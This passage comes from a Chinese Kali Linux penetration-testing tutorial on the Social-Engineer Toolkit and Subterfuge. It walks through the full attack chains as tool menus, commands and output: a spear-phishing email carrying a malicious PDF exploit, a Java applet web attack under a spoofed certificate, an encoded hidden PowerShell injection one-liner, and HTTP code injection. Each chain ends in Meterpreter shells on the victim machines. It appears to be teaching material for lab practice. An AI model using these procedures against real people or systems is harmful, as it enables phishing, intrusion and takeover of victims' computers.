• 7.4 使用SET实施攻击
    • 7.4.1 针对性钓鱼攻击向量
    • 7.4.2 Web攻击向量
    • 7.4.3 PowerShell攻击向量
    • 7.4.4 自动化中间人攻击工具Subterfuge

    7.4 使用SET实施攻击


    7.4.1 针对性钓鱼攻击向量

    针对性钓鱼攻击向量通过构造特殊文件格式的漏洞进行渗透攻击,如利用Adobe Reader 8.1.0(PDF阅读器)的漏洞。实现钓鱼攻击向量主要通过发送邮件附件的方式,将包含渗透代码的文件发送到目标主机。当目标主机的用户打开邮件附件时,目标主机就会被攻陷和控制。








    1. set> 1
    2. The Spearphishing module allows you to specially craft email messages and send
    3. them to a large (or small) number of people with attached fileformat malicious
    4. payloads. If you want to spoof your email address, be sure "Sendmail" is in-
    5. stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
    6. flag to SENDMAIL=ON.
    7. There are two options, one is getting your feet wet and letting SET do
    8. everything for you (option 1), the second is to create your own FileFormat
    9. payload and use it in your own attack. Either way, good luck and enjoy!
    10. 1) Perform a Mass Email Attack
    11. 2) Create a FileFormat Payload
    12. 3) Create a Social-Engineering Template
    13. 99) Return to Main Menu



    1. set:phishing>1
    2. Select the file format exploit you want.
    3. The default is the PDF embedded EXE.
    4. ********** PAYLOADS **********
    5. 1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
    6. 2) SET Custom Written Document UNC LM SMB Capture Attack
    7. 3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
    8. 4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
    9. 5) Adobe Flash Player "Button" Remote Code Execution
    10. 6) Adobe CoolType SING Table "uniqueName" Overflow
    11. 7) Adobe Flash Player "newfunction" Invalid Pointer Use
    12. 8) Adobe Collab.collectEmailInfo Buffer Overflow
    13. 9) Adobe Collab.getIcon Buffer Overflow
    14. 10) Adobe JBIG2Decode Memory Corruption Exploit
    15. 11) Adobe PDF Embedded EXE Social Engineering
    16. 12) Adobe util.printf() Buffer Overflow
    17. 13) Custom EXE to VBA (sent via RAR) (RAR required)
    18. 14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
    19. 15) Adobe PDF Embedded EXE Social Engineering (NOJS)
    20. 16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
    21. 17) Apple QuickTime PICT PnSize Buffer Overflow
    22. 18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
    23. 19) Adobe Reader u3D Memory Corruption Vulnerability
    24. 20) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
    25. set:payloads>8


    (5)这里利用Abobe PDF的Collab.collectEmaillnfo漏洞,所以选择编号8,如下所示:




    1. set:payloads>2
    2. set> IP address for the payload listener: #设置攻击主机的地址
    3. set:payloads> Port to connect back on [443]: #设置攻击主机的端口号
    4. [-] Defaulting to port 443
    5. [-] Generating fileformat exploit
    6. [*] Payload creation complete.
    7. [*] All payloads get sent to the /root/.set/template.pdf directory
    8. [-] As an added bonus, use the file-format creator in SET to create your attachment.
    9. Right now the attachment will be imported with filename of'template.
    10. whatever'
    11. Do you want to rename the file?
    12. example Enter the new filename: moo.pdf
    13. 1\. Keep the filename, I don't care.
    14. 2\. Rename the file, I want to be cool.



    1. set:phishing>1
    2. [*] Keeping the filename and moving on.
    3. Social Engineer Toolkit Mass E-Mailer
    4. There are two options on the mass e-mailer, the first would
    5. be to send an email to one individual person. The second option
    6. will allow you to import a list and send it to as many people as
    7. you want within that list.
    8. What do you want to do:
    9. 1\. E-Mail Attack Single Email Address
    10. 2\. E-Mail Attack Mass Mailer
    11. 99\. Return to main menu.



    1. set:phishing>1
    2. Do you want to use a predefined template or craft
    3. a one time email template.
    4. 1\. Pre-Defined Template
    5. 2\. One-Time Use Email Template



    1. set:phishing>1
    2. [-] Available templates:
    3. 1: Have you seen this?
    4. 2: How long has it been?
    5. 3: Strange internet usage from your computer
    6. 4: Status Report
    7. 5: New Update
    8. 6: Computer Issue
    9. 7: Dan Brown's Angels & Demons
    10. 8: Order Confirmation
    11. 9: WOAAAA!!!!!!!!!! This is crazy…
    12. 10: Baby Pics


    (10)这里选择使用预先定义的SET邮件模板Status Report,输入编号4,如下所示:

    1. set:phishing>4
    2. set:phishing> Send email to:********@126.com #设置发送邮件的目的地址
    3. 1\. Use a gmail Account for your email attack.
    4. 2\. Use your own server or open relay



    1. set:phishing>1
    2. set:phishing> Your gmail email address:***********@gmail.com #输入Gmail邮件账户
    3. set:phishing> The FROM NAME user will see: :
    4. Email password: #输入邮箱密码
    5. set:phishing> Flag this message/s as high priority? [yes|no]:yes
    6. [*] SET has finished delivering the emails
    7. set:phishing> Setup a listener [yes|no]:






    1. msf exploit(handler) >
    2. [*] Sending stage (769024 bytes) to
    3. [*] Meterpreter session 1 opened ( -> at 2014-06-07 11:17:11 +0800




    1. msf exploit(handler) > sessions -i 1
    2. [*] Starting interaction with 1
    3. meterpreter >


    1. meterpreter > shell
    2. [-] Failed to spawn shell with thread impersonation. Retrying without it.
    3. Process 792 created.
    4. Channel 2 created.
    5. Microsoft Windows XP [版本 5.1.2600]
    6. (C) 版权所有 1985-2001 Microsoft Corp.
    7. C:\Documents and Settings\Test\桌面>

    输出信息显示为C:\Documents and Settings\Test\桌面>,表示成功登录到目标主机。此时相当于是以Test用户的身份,在目标主机中进行操作。查看当前目录中的文件夹,如下所示:

    1. C:\Documents and Settings\Test\桌面>dir #列出目录中的所有文件
    2. dir
    3. 驱动器C中的卷没有标签
    4. 卷的序列号是 1806-07F4
    5. C:\Documents and Settings\Test\桌 的目录
    6. 2014-06-07 11:11 <DIR> .
    7. 2014-06-07 11:11 <DIR> ..
    8. 2014-05-06 19:46 54 111.txt
    9. 2014-06-07 11:00 57,364,480 AdbeRdr810_zh_CN.msi
    10. 2014-06-06 16:01 46,844 JEdB2oma7AEGV7G.pdf
    11. 2014-06-06 18:54 6,619 template.pdf
    12. 4 个文件 57,417,997 字节
    13. 2 个目录 38,359,552,000 可用字节


    1. C:\Documents and Settings\Test\桌面>type 111.txt #查看文件内容
    2. type 111.txt
    3. Ethernet adapter 本地连接:
    4. Connection-specific DNS Suffix . : localdomain
    5. IP Address. . . . . . . . . . . . :
    6. Subnet Mask . . . . . . . . . . . :
    7. Default Gateway . . . . . . . . . :


    7.4.2 Web攻击向量


    【实例7-2】下面使用Java applet攻击实现Web攻击向量。具体操作步骤如下所示。

    Java applet攻击引入了恶意Java applet程序进行智能化的浏览器检查,确保applet能在目标浏览器中正确运行,同时也能在目标主机上运行攻击载荷。Java applet攻击并不被认为是Java本身的漏洞,只是当受攻击目标浏览恶意网页时,网页会弹出一个警告。该警告信息询问是否需要运行一个不被信任的Java applet程序。由于Java允许用户对一个apple选择任意名字进行签名,用户可以为它的发布者定义为Google和Microsoft等。这样,很容易使一些人遭受攻击。


    1. root@kali:~# setoolkit
    2. Select from the menu:
    3. 1) Social-Engineering Attacks
    4. 2) Fast-Track Penetration Testing
    5. 3) Third Party Modules
    6. 4) Update the Metasploit Framework
    7. 5) Update the Social-Engineer Toolkit
    8. 6) Update SET configuration
    9. 7) Help, Credits, and About
    10. 99) Exit the Social-Engineer Toolkit
    11. set>






    1. set> 2
    2. The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
    3. The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
    4. The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.
    5. The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.
    6. The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.
    7. The Web-Jacking Attack method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.
    8. The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.
    9. 1) Java Applet Attack Method
    10. 2) Metasploit Browser Exploit Method
    11. 3) Credential Harvester Attack Method
    12. 4) Tabnabbing Attack Method
    13. 5) Web Jacking Attack Method
    14. 6) Multi-Attack Web Method
    15. 7) Full Screen Attack Method
    16. 99) Return to Main Menu
    17. set:webattack>


    (4)这里选择Java applet攻击方法,输入编号1。将显示如下所示的信息:

    1. set:webattack>1
    2. The first method will allow SET to import a list of pre-defined web
    3. applications that it can utilize within the attack.
    4. The second method will completely clone a website of your choosing
    5. and allow you to utilize the attack vectors within the completely
    6. same web application you were attempting to clone.
    7. The third method allows you to import your own website, note that you
    8. should only have an index.html when using the import website
    9. functionality.
    10. 1) Web Templates
    11. 2) Site Cloner
    12. 3) Custom Import
    13. 99) Return to Webattack Menu
    14. set:webattack>

    输出的信息显示了Java applet攻击的菜单列表。一般情况下,使用前两种。其中第一种(Web模块)是社会工程学创建一个一般的网页;第二种(复制网站)是使用已存在的网页作为一个模块,来攻击网页。




    (6)这里选择Windows Reverse_TCP Meterpreter攻击载荷,建立一个反向TCP连接。输入编号2,将显示如下所示的信息:





    图7.20 警告对话框

    (8)从该界面可以看到有一个警告对话框,询问是否要运行该程序。该对话框就是Java applet弹出的。从名称中可以看到,是Verified Trusted and secure(VERIFIED)。现在单击“运行”按钮,攻击主机将会创建多个远程会话,如下所示:

    1. [*] Sending stage (769536 bytes) to
    2. [*] Meterpreter session 1 opened ( -> at 2014-07-19 12:23:24 +0800
    3. [*] Meterpreter session 2 opened ( -> at 2014-07-19 12:23:25 +0800
    4. [*] Meterpreter session 3 opened ( -> at 2014-07-19 12:23:25 +0800
    5. [*] Meterpreter session 4 opened ( -> at 2014-07-19 12:23:25 +0800
    6. msf exploit(handler) >






    1. msf exploit(handler) > sessions -i 1
    2. [*] Starting interaction with 1
    3. meterpreter > shell
    4. Process 5056 created.
    5. Channel 1 created.
    6. Microsoft Windows [版本 6.1.7601]
    7. (c) 2009 Microsoft Corporation
    8. C:\Users\Administrator\Desktop>


    7.4.3 PowerShell攻击向量




    1. Select from the menu:
    2. 1) Social-Engineering Attacks
    3. 2) Fast-Track Penetration Testing
    4. 3) Third Party Modules
    5. 4) Update the Metasploit Framework
    6. 5) Update the Social-Engineer Toolkit
    7. 6) Update SET configuration
    8. 7) Help, Credits, and About
    9. 99) Exit the Social-Engineer Toolkit
    10. set>


    1. set> 1
    2. Select from the menu:
    3. 1) Spear-Phishing Attack Vectors
    4. 2) Website Attack Vectors
    5. 3) Infectious Media Generator
    6. 4) Create a Payload and Listener
    7. 5) Mass Mailer Attack
    8. 6) Arduino-Based Attack Vector
    9. 7) SMS Spoofing Attack Vector
    10. 8) Wireless Access Point Attack Vector
    11. 9) QRCode Generator Attack Vector
    12. 10) Powershell Attack Vectors
    13. 11) Third Party Modules
    14. 99) Return back to the main menu.
    15. set>


    1. set> 10
    2. The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventative technologies.
    3. 1) Powershell Alphanumeric Shellcode Injector
    4. 2) Powershell Reverse Shell
    5. 3) Powershell Bind Shell
    6. 4) Powershell Dump SAM Database
    7. 99) Return to Main Menu
    8. set:powershell>





    1. root@kali:~# cd /root/.set/reports/powershell/
    2. root@kali:~/.set/reports/powershell# ls
    3. powershell.rc x86_powershell_injection.txt
    4. root@kali:~/.set/reports/powershell# cat x86_powershell_injection.txt
    5. powershell -nop -windows hidden -noni -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBb


    (6)此时,可以将x86_powershell_injection.txt文件中的内容复制到目标主机(Windows 7)的DOS下,然后运行。Kali主机将会显示如下所示的信息:

    1. [*] Sending stage (769536 bytes) to
    2. [*] Meterpreter session 1 opened ( -> at 2014-07-18 15:36:00 +0800



    1. msf exploit(handler) > sessions -i 1
    2. [*] Starting interaction with 1
    3. meterpreter > shell
    4. Process 636 created.
    5. Channel 1 created.
    6. Microsoft Windows [版本 6.1.7601]
    7. (c) 2009 Microsoft Corporation
    8. C:\Users\Administrator>



    7.4.4 自动化中间人攻击工具Subterfuge





    1. root@kali:~# tar zxvf subterfuge_packages.tar.gz


    1. root@kali:~# cd subterfuge/
    2. root@kali:~/subterfuge# python install.py



    图7.21 安装Subterfuge界面

    (4)在该界面选择Full Install With Depencencies选项,并单击Install按钮。安装完成后,将显示如图7.22所示的界面。


    图7.22 安装完成




    1. root@kali:~# subterfuge


    1. Subterfuge courtesy of r00t0v3rr1d3 & 0sm0s1z
    2. Validating models
    3. 0 errors found
    4. Django version 1.3.1, using settings 'subterfuge.settings'
    5. Development server is running at
    6. Quit the server with CONTROL-C.



    图7.23 Subterfuge主界面


    在Subterfuge界面的Modules菜单下,可以选择所有提供的不同模块进行攻击。使用Settings菜单,可以修改Subterfuge一些功能,并且启动攻击。下面使用HTTP Code Injection模块,实现浏览器攻击。

    【实例7-6】演示使用Subterfuge的HTTP Code Injection模块攻击浏览器。具体操作步骤如下所示。



    图7.24 所有攻击模块

    (2)在该界面选择HTTP Code Injection模块,将显示如图7.25所示的界面。


    图7.25 设置HTTP Code Injection模块

    (3)在该界面设置HTTP Code Injection模块的插件信息。这里使用默认设置,并单击Apply按钮,将显示如图7.26所示的界面。


    图7.26 加载Metasploit框架



    图7.27 加载渗透攻击模块



    图7.28 模块加载完成

    (6)从该界面可以看到有一条Done,found 18 exploit modules信息,表示Subterfuge找到了18个渗透攻击模块。当某个用户连接Kali时,将会使用其中的一个模块。当目标主机访问Kali上的Subterfuge时,将会自动启动大量的渗透攻击到目标主机的浏览器上。此时,Kali系统上将显示如图7.29所示的界面。


    图7.29 访问攻击主机



    图7.30 打开的会话



    图7.31 Shell窗口


    原文: https://wizardforcel.gitbooks.io/daxueba-kali-linux-tutorial/content/39.html